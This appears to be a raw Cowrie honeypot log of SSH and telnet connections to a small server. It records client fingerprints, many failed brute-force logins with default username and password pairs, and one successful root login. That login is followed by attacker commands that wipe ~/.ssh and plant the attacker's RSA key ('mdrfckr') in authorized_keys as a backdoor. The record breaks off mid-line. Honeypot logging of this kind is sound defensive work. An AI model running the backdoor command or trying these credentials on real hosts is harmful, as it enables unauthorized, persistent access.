{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:57:24.239728Z","src_ip":"68.183.87.241","session":"0b43f12a950d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:57:24.505816Z","src_ip":"68.183.87.241","session":"0b43f12a950d"}
{"eventid":"cowrie.login.failed","username":"office","password":"office123","message":"login attempt [office/office123] failed","sensor":"my-vps","timestamp":"2025-08-26T03:57:25.679695Z","src_ip":"68.183.87.241","session":"0b43f12a950d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:57:26.949569Z","src_ip":"68.183.87.241","session":"0b43f12a950d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33788,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d890945cffa","protocol":"ssh","message":"New connection: 212.227.125.160:33788 (1.2.3.4:22) [session: 5d890945cffa]","sensor":"my-vps","timestamp":"2025-08-26T03:57:31.194800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:57:31.195796Z","src_ip":"212.227.125.160","session":"5d890945cffa"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T03:57:31.245838Z","src_ip":"212.227.125.160","session":"5d890945cffa"}
{"eventid":"cowrie.login.failed","username":"webadmin","password":"webadmin","message":"login attempt [webadmin/webadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T03:57:31.398072Z","src_ip":"212.227.125.160","session":"5d890945cffa"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:57:32.499343Z","src_ip":"212.227.125.160","session":"5d890945cffa"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":49182,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd07fb573f6e","protocol":"ssh","message":"New connection: 103.217.145.104:49182 (1.2.3.4:22) [session: dd07fb573f6e]","sensor":"my-vps","timestamp":"2025-08-26T03:57:46.829783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:57:46.830515Z","src_ip":"103.217.145.104","session":"dd07fb573f6e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:57:47.098843Z","src_ip":"103.217.145.104","session":"dd07fb573f6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56256,"dst_ip":"1.2.3.4","dst_port":22,"session":"d335c6fbff23","protocol":"ssh","message":"New connection: 212.227.235.229:56256 (1.2.3.4:22) [session: d335c6fbff23]","sensor":"my-vps","timestamp":"2025-08-26T03:57:48.105925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:57:48.106993Z","src_ip":"212.227.235.229","session":"d335c6fbff23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:57:48.360151Z","src_ip":"212.227.235.229","session":"d335c6fbff23"}
{"eventid":"cowrie.login.failed","username":"tpuser","password":"123","message":"login attempt [tpuser/123] failed","sensor":"my-vps","timestamp":"2025-08-26T03:57:48.383156Z","src_ip":"103.217.145.104","session":"dd07fb573f6e"}
{"eventid":"cowrie.login.failed","username":"release","password":"release","message":"login attempt [release/release] failed","sensor":"my-vps","timestamp":"2025-08-26T03:57:49.422205Z","src_ip":"212.227.235.229","session":"d335c6fbff23"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:57:49.653412Z","src_ip":"103.217.145.104","session":"dd07fb573f6e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:57:50.678468Z","src_ip":"212.227.235.229","session":"d335c6fbff23"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63758,"dst_ip":"1.2.3.4","dst_port":22,"session":"34bdf9abc2eb","protocol":"ssh","message":"New connection: 217.72.205.35:63758 (1.2.3.4:22) [session: 34bdf9abc2eb]","sensor":"my-vps","timestamp":"2025-08-26T03:57:56.409098Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:57:56.410322Z","src_ip":"217.72.205.35","session":"34bdf9abc2eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48055,"dst_ip":"1.2.3.4","dst_port":23,"session":"888e4a2414e4","protocol":"telnet","message":"New connection: 212.227.125.160:48055 (1.2.3.4:23) [session: 888e4a2414e4]","sensor":"my-vps","timestamp":"2025-08-26T03:58:21.584611Z"}
{"eventid":"cowrie.session.closed","duration":12.75490951538086,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:58:34.338804Z","src_ip":"212.227.125.160","session":"888e4a2414e4"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":46618,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d2c239a95c6","protocol":"ssh","message":"New connection: 68.183.87.241:46618 (1.2.3.4:22) [session: 9d2c239a95c6]","sensor":"my-vps","timestamp":"2025-08-26T03:58:39.226898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:58:39.228228Z","src_ip":"68.183.87.241","session":"9d2c239a95c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:58:39.502903Z","src_ip":"68.183.87.241","session":"9d2c239a95c6"}
{"eventid":"cowrie.login.failed","username":"i","password":"i","message":"login attempt [i/i] failed","sensor":"my-vps","timestamp":"2025-08-26T03:58:40.616150Z","src_ip":"68.183.87.241","session":"9d2c239a95c6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:58:41.872726Z","src_ip":"68.183.87.241","session":"9d2c239a95c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47574,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f563a4e1d66","protocol":"ssh","message":"New connection: 212.227.235.229:47574 (1.2.3.4:22) [session: 4f563a4e1d66]","sensor":"my-vps","timestamp":"2025-08-26T03:59:09.389719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:59:09.390649Z","src_ip":"212.227.235.229","session":"4f563a4e1d66"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:59:11.436172Z","src_ip":"212.227.235.229","session":"4f563a4e1d66"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"root","message":"login attempt [odoo/root] failed","sensor":"my-vps","timestamp":"2025-08-26T03:59:12.219198Z","src_ip":"212.227.235.229","session":"4f563a4e1d66"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:59:13.481841Z","src_ip":"212.227.235.229","session":"4f563a4e1d66"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":52676,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e02db8d2cb1","protocol":"ssh","message":"New connection: 103.217.145.104:52676 (1.2.3.4:22) [session: 9e02db8d2cb1]","sensor":"my-vps","timestamp":"2025-08-26T03:59:14.382307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:59:14.383185Z","src_ip":"103.217.145.104","session":"9e02db8d2cb1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:59:14.657520Z","src_ip":"103.217.145.104","session":"9e02db8d2cb1"}
{"eventid":"cowrie.login.success","username":"root","password":"Gu123456","message":"login attempt [root/Gu123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:59:15.800874Z","src_ip":"103.217.145.104","session":"9e02db8d2cb1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:59:16.413851Z","src_ip":"103.217.145.104","session":"9e02db8d2cb1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:59:16.414636Z","src_ip":"103.217.145.104","session":"9e02db8d2cb1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:59:16.415633Z","src_ip":"103.217.145.104","session":"9e02db8d2cb1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:59:16.692387Z","src_ip":"103.217.145.104","session":"9e02db8d2cb1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:59:17.259851Z","src_ip":"103.217.145.104","session":"9e02db8d2cb1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:59:17.260574Z","src_ip":"103.217.145.104","session":"9e02db8d2cb1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:59:17.541149Z","src_ip":"103.217.145.104","session":"9e02db8d2cb1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:59:17.542087Z","src_ip":"103.217.145.104","session":"9e02db8d2cb1"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":52690,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd135fdf6da5","protocol":"ssh","message":"New connection: 103.217.145.104:52690 (1.2.3.4:22) [session: cd135fdf6da5]","sensor":"my-vps","timestamp":"2025-08-26T03:59:17.813151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:59:17.814988Z","src_ip":"103.217.145.104","session":"cd135fdf6da5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:59:18.086987Z","src_ip":"103.217.145.104","session":"cd135fdf6da5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:59:19.484737Z","src_ip":"103.217.145.104","session":"cd135fdf6da5"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:59:20.777324Z","src_ip":"103.217.145.104","session":"cd135fdf6da5"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":52114,"dst_ip":"1.2.3.4","dst_port":22,"session":"ead64ce4185b","protocol":"ssh","message":"New connection: 103.217.145.104:52114 (1.2.3.4:22) [session: ead64ce4185b]","sensor":"my-vps","timestamp":"2025-08-26T03:59:21.042573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:59:21.043789Z","src_ip":"103.217.145.104","session":"ead64ce4185b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-